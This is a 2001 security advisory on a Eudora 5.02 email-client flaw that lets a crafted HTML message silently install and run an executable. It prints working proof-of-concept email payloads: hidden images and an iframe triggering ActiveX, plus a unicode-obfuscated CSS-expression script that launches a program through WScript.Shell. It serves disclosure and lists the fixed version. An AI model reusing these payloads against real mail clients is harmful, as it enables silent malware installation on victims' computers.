Eudora Silent Delivery and Installation of Executables


27 march 2001

  Eudora Silent Delivery and Installation of Executables
------------------------------------------------------------------------


SUMMARY

A vulnerability in Eudora mailing client enables attackers to send a 
special e-mail that will silently install and run an executable on the 
remote client. No client input is required other than opening an email 
using Eudora 5.02 - Sponsored Mode provided 'use Microsoft viewer' and 
'allow executables in HTML content' are enabled.

DETAILS

Vulnerable systems:
Eudora 5.02 - Sponsored Mode

Immune systems:
Eudora 5.1

Example:
This can be exploited with relative ease as follows:

1. Create the following HTML mail message:

<img SRC="cid:mr.malware.to.you" style="display:none">
<img id=W0W src="cid:malware.com"   style="display:none">
<center><h6>YOU!DORA</h6></center>
<IFRAME  id=malware width=10 height=10 style="display:none" ></IFRAME>

<script>
// 18.03.01 http://www.malware.com
malware.location.href=W0W.src
</script>

Where our first image is our executable. Our second image comprises a 
simple JavaScripting and ActiveX control.

Once the mail message is opened in Eudora 5.02 - Sponsored Mode, the two 
'embedded' images are silently and instantly transferred to the 'Embedded' 
folder. Our very simple JavaScript location.href then automatically calls 
our second image comprising the simple JavaScripting and ActiveX control 
(note: knowing the file names and locations is not necessary at all!), 
which is then displayed out of sight in our iframe. This in turn executes 
our *.exe.

Because our *.exe and our simple JavaScripting and ActiveX control reside 
in the same folder (the so-called "Embedded' folder), and because it is 
automatically called to our iframe, everything is instant.

2. A working example incorporating a harmless *.exe file is available at:  
http://www.malware.com/you!DORA.txt

3. The following attack will work even if 'Allow executables in HTML 
content' is disabled.
This is specifically constructed to fire the ActiveX warning so that it is 
visually illustrated (harmless WSH to fire telnet if you click ok).

Note that the warning message is by design and only for illustrative 
purposes.

  <img SRC="cid:malware.com" height=2 width=2
STYLE="left:expression(document.write('\u0020 
\u0020\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u0076\u0061\u0072 \u0020\u0077\u0073\u0068\u003d\u006e\u0065\u0077\u0020\u0041\u0063\u0074\u0069\u0076\u0065\u0058\u004f\u0062\u006a\u0065 \u0063\u0074\u0028\u0027\u0057\u0053\u0063\u0072\u0069\u0070\u0074\u002e\u0053\u0068\u0065\u006c\u006c\u0027\u0029 \u003b\u0020\u0020\u0077\u0073\u0068\u002e\u0052\u0075\u006e\u0028\u0027\u0074\u0065\u006c\u006e\u0065\u0074\u002e \u0065\u0078\u0065\u0027\u0029\u003b\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u003c\u0021\u002d \u002d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u006d\u0061\u006c\u0077\u0061\u0072\u0065\u002e\u0063\u006f\u006d\u0020\u0032\u0032\u002e\u0030\u0032\u002e\u0030\u0031\u0020 \u002d\u002d\u003e'))">

This attack was tested on win98, IE5.5, "Eudora 5.0.2 - Sponsored Mode", 
with "Microsoft Viewer" enabled, and "Allow executables in HTML content" 
disabled.

Solution:
This inline scripting hole has been fixed in Eudora 5.1.  A beta of 5.1 
can be found at  http://www.eudora.com/betas/. The final release of 5.1 will be out very 
soon.

======================================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.